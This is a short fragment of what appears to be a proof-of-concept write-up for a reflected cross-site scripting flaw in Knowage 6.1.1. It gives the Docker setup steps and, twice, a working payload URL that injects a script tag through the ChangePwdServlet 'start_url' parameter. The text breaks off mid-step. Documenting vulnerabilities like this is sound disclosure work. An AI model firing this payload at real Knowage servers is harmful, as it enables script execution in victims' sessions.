- After authenticating access:
http://SERVER_IP:8080/knowage/ChangePwdServlet?start_url=test"><script>alert(1)</script>test
- Knowage 6.1.1
- git
- docker
- docker-compose
- At least 2GB RAM
- Terminal
docker-compose up
- Web Browser
- Go to
http://SERVER_IP:8080/knowage/ChangePwdServlet?start_url=test"><script>alert(1)</script>test
, this performs XSS
- Go to